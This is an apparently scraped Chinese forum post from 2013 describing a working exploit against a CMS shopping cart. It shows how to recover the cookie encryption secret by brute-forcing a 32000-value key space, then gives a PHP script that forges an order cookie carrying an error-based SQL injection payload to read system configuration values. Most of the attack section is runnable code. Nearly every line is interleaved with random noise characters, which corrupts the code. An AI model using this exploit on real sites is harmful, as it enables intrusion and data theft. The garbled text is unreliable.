www.xxx.com/plus/search.php?keyword=: c! V/ w v2 s! i T
在 include/shopcar.class.php中
2 j8 k; x3 t7 @) o7 a l( R+ ~先看一下这个shopcar类是如何生成cookie的! B a _* T8 [/ v+ Y0 F
239 function saveCookie($key,$value)
4 _0 z7 g. L: g240 {9 `2 O; S% W$ {' ^8 d# E
241 if(is_array($value))
% t& u: d9 P* x# k6 f) i242 {
6 R3 g4 |4 s% b e243 $value = $this->enCrypt($this->enCode($value));
8 w, b( d7 _% m( Q! ]3 _244 }4 c- Y6 M1 }1 G5 J! W1 J. `/ C2 A
245 else
; T: W7 q2 X$ b% b: X0 ?1 x246 {$ r: p' K' P! p. [1 a' J
247 $value = $this->enCrypt($value);3 C; F) x6 Q- v K3 p+ {& F
248 }
7 c+ {: D+ G$ }# [) G- B: x249 setcookie($key,$value,time()+36000,’/');
8 I: { G% U4 p) ?0 U% X0 O7 o250 }
. U3 A+ E$ X# ^8 j' f' e+ P简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数* f# G! E* M* M3 b8 o' Y1 A
186 function enCrypt($txt)
$ S6 i! k5 i3 o u- g187 {
+ `8 W* [) A/ G3 N4 P188 srand((double)microtime() * 1000000);
; u2 L# B2 q" N( H3 p189 $encrypt_key = md5(rand(0, 32000));
* d8 l0 J2 a1 Q; U190 $ctr = 0;% S# n' C4 {0 K8 {; U
191 $tmp = ”;
U* p6 x- J6 h9 X192 for($i = 0; $i < strlen($txt); $i++). e% {* \; z* E8 ^& X# s
193 {& M' s- Y. `& \- a& o. N6 H
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;4 [1 j( _% ~' c' V; d) b% D2 z
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);- D% r0 z c1 c# G( z1 m
196 }
" I+ G% R0 P( d. I' p197 return base64_encode($this->setKey($tmp));$ L- v E" R( x- Q `" _4 U0 R: @/ q
198 }
4 i0 e" N+ [% q" X213 function setKey($txt)) A& g$ p! k, x7 U
214 {
0 G. ]1 `2 E/ O/ _215 global $cfg_cookie_encode;
, s7 E+ \' B& K6 R/ P% a# I216 $encrypt_key = md5(strtolower($cfg_cookie_encode)); T; [' r) ^ N$ {" r' N; }
217 $ctr = 0;
9 {1 j1 U3 J+ N( o1 u218 $tmp = ”;% X8 v6 V$ K9 }% W0 M8 Y
219 for($i = 0; $i < strlen($txt); $i++)
; L0 {9 N* @& Z* _+ o9 u. q220 {' N9 m3 b* C) i( x7 B6 m) ^
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;' @8 | y( N4 {& \: l ]
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
T- \2 M. i: }# `223 }
# r1 i) Z0 K! X4 E224 return $tmp;* O! E8 g5 O3 v0 y: }
225 }
Y- N& { P: ]enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的: l/ Z+ a9 u) P: K) m+ ]
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
, s, W" K6 L7 Q3 t9 Z+ ]具体代码如下:. x( j' x) l/ A* v9 K R
<?php& c1 b0 p( C6 `4 h
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
% k! s( l2 n/ k/ z2 R: ~$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
2 ] A: N0 J4 F. n* M* R$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here" Y, o( ]( p" f( k6 u% M
function reStrCode($code,$string)6 P9 P' Q8 v! i
{, B! S3 R6 [" d0 {1 P7 Y
$code = base64_decode($code);0 B; M3 t o2 m4 x! w, h
$key = “”;
}0 S1 ^& |: c6 W/ N [4 J, J( Bfor($i=0 ; $i<32 ; $i++)
: C$ ?5 C3 Y# M' P, Q6 x! ~{+ E R- | D C1 z- A/ ]- @3 v
$key .= $string[$i] ^ $code[$i];
+ |% V, ^+ j, a/ s, M+ w}
$ b3 I3 T% C z2 G- vreturn $key;
) \$ g ^& z: T6 S3 I' {+ f}
( P" C( z* ~5 j% Qfunction getKeys($cookie,$plantxt)
3 ?; h: C" B6 i; U{
" U2 y7 D8 m5 U" s% }$tmp = $cookie;" _+ u) k, A; _8 S! w" c4 `
$results = array();
! v, @9 F5 c4 I5 k- pfor($j=0 ; $j < 32000; $j++); G+ M. e9 J* g, y% H- T* ~
{; R, q+ O0 h' v' W0 H; U6 M4 F
- z% q) V# G! E6 q0 U3 j$txt = $plantxt;1 e! v) R! Y$ ~3 ^" \
$ctr = 0;6 H8 _% @' [: Z9 V6 \
$tmp = ”;+ m: O( _8 w( m% w, [6 f- F. j
$encrypt_key = md5($j);
& w, B: b; A' T2 h- `4 h$ yfor($i =0; $i < strlen($txt); $i ++)
/ q/ I& D. o( \7 ? W6 u0 x{( `& A& h; a# X) a; L7 h. x0 F
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
7 U& s5 P v2 Z Q$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
% n% j1 S/ c% ], ^) d}
/ ~7 Z) W6 O7 @$ W+ J$ {/ K$string = $tmp;- S( K1 R1 q( B- j
$code = $cookie;' ?: e) F) F, L' |1 l
$result = reStrCode($code,$string);
6 F+ P$ C: w0 X# k- r3 \if(eregi(‘^[a-z0-9]+$’,$result))
0 U5 ]' C9 `- M# T( D6 w" k/ Y{, N/ B2 ^$ h6 v+ u( m: G
echo $result.”\n”;: c2 [4 M6 A2 [) {
$results[] = $result;$ D% V) l1 N5 v" `) D1 D% F
}' R2 y# S. ~8 p0 M" d
}
8 [+ N9 Y$ I* D# Qreturn $results;
* |% s, [/ L7 I' L}
8 z1 \9 {8 h& ~: q' [! @$results1 = getKeys($cookie1,$plantxt);
# L; R- r0 t3 ~! ~$results2 = getKeys($cookie2,$plantxt);& S7 ?5 j: {1 g- t
print “\n——————–real key————————–\n”;, v& m% X% p) _# `; \- U- h
foreach($results1 as $test1)
3 n3 Z/ W# \( F1 @7 a{
8 I+ A( I# F* a1 j" yforeach($results2 as $test2)
) r2 A0 A5 r) k3 }{4 \- J/ F$ n' p4 _8 j$ K' ]# E& I! s
if($test1 == $test2)3 r" y" k4 h& M/ h& m
{
* A g( S9 w) ]0 L7 E0 W- recho $test1.”\n”;3 d: ]5 t! ~' J5 i9 v2 T- d" L
}
) Y5 m6 I0 a1 g3 T/ [& U5 h}! ?4 T6 g2 W7 m* O! S" v5 l
}
+ y/ A+ P5 s& o% g?>
, B4 U9 V7 O/ ^1 r$ B* x# m& Vcookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
% C0 j' @8 M# e/ X5 n# jplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
+ Q& W, P. G% h) L* f; A( \然后推算出md5(strtolower($cfg_cookie_encode))
; S1 u: ]7 l; [1 O7 m4 W得到这个key之后,我们就可以构造任意购物车的cookie
5 `- w0 _0 p8 L2 s ]5 t接着看
; ^7 S5 \# \$ H# _5 [$ v& R t20 class MemberShops
, n: V: {; X1 X. f5 Z0 `5 H( P% e21 {
$ I" W: l& Z; i22 var $OrdersId;
' m# L J: l( r/ ]5 _% e' F2 N9 K* t+ u23 var $productsId;
3 `7 @! ^$ e, C; W! M. O. z24
# k |9 C1 b5 [7 c. s z$ f25 function __construct()4 \; l9 @3 { o& A
26 {+ I2 h' \) h& M) @" L! C# P
27 $this->OrdersId = $this->getCookie(“OrdersId”);
+ Q4 Q' B' O5 i; s' D6 b9 X8 F+ t28 if(empty($this->OrdersId))
5 G4 B9 c) q4 {. W/ U* v, R( U) Z: q2 m29 {, g) }. i( g* z" S3 C7 n* U
30 $this->OrdersId = $this->MakeOrders();
# f' V! \' D) R/ O3 E8 a1 I% p31 }( {. g7 U5 g5 j& @( U
32 }
1 k$ y) X3 D3 v% y w6 j i发现OrderId是从cookie里面获取的
) U" y( I/ _0 F9 A- j然后
% _! b! G- U) Y0 U; s+ l) h/plus/carbuyaction.php中的
# _4 e/ e0 [6 |, f29 $cart = new MemberShops();
& m* \8 J, B. [5 G# F/ W39 $OrdersId = $cart->OrdersId; //本次记录的订单号1 z, L, d ~5 V1 }
……
5 i7 }+ D# G3 z173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);2 F& ?/ m p& x( i. s
接着我们就可以注入了
$ i, e- b- ^! B6 ^5 \通过利用下面代码生成cookie:1 j" y; `$ v' A( ^
<?php* E! E/ e2 {9 h2 B
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
# F6 p2 H' z. H( I0 s# E" G z4 X$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here8 m' n& ?1 u e! ^% F
function setKey($txt)
; a3 p x, M) N/ O{
- U' _. [3 }7 rglobal $encrypt_key;% y w+ P0 y0 A% t- u7 ~5 D, f
$ctr = 0;1 G2 H6 O# g3 Q3 t4 N# H4 y
$tmp = ”; V/ U5 i0 G( S1 ]: m0 {2 `
for($i = 0; $i < strlen($txt); $i++)
4 i. u& }- G2 }7 N" T" V5 u{
+ W* k6 z! k7 E' |$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;) Z; f7 c- b+ S; m. n
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];$ Q' W2 `. s2 G- h* H
}" v" v: e' m& Q" h" [+ r$ `/ P
return $tmp;2 @2 P$ f- `6 c' x
}/ w7 o& z' _/ W( k
function enCrypt($txt)1 q7 ]3 }/ t6 p( H9 T) z
{
+ {. s2 x `* S. N% ]/ Msrand((double)microtime() * 1000000);
0 M; y: e' S: d* L$encrypt_key = md5(rand(0, 32000));0 ^/ E* O3 [& q
$ctr = 0;
3 r8 e& C0 g8 i* s! i$tmp = ”;' u" H9 d9 e1 q# _: T
for($i = 0; $i < strlen($txt); $i++)$ p( o. V- G' U* } Y( I7 ^
{' _5 `7 V6 T, M3 p
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; j% x- P/ t$ g2 F& S
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);/ ^/ s# u" k/ U0 O
}
( d/ [( ?8 m1 ? `2 d# c/ mreturn base64_encode(setKey($tmp)); a" ?6 q( ?4 C$ k$ ~* `
} l) {" E; x% ^2 F
for($dest =0;$dest = enCrypt($txt);)
1 K5 X- ]0 b+ H/ z% V. f{
5 x X8 z% ]) B6 i* r) bif(!strpos($dest,’+'))0 ~- G1 y1 b' \% ]
{
2 w- X6 W; C( f( `7 K. Q! Ubreak;' L: G! h; l/ p# r3 j, G
}# P4 B- B8 Q0 m9 F
}
- y6 l- Y' o( \8 {echo $dest.”\n”;
. w$ w* O+ g$ A# B# m4 L?>
; X3 E/ z' H$ R( u1 |) a7 o0 I; l4 e* g
|
发表于 2013-2-13 23:58:29
收藏
支持
反对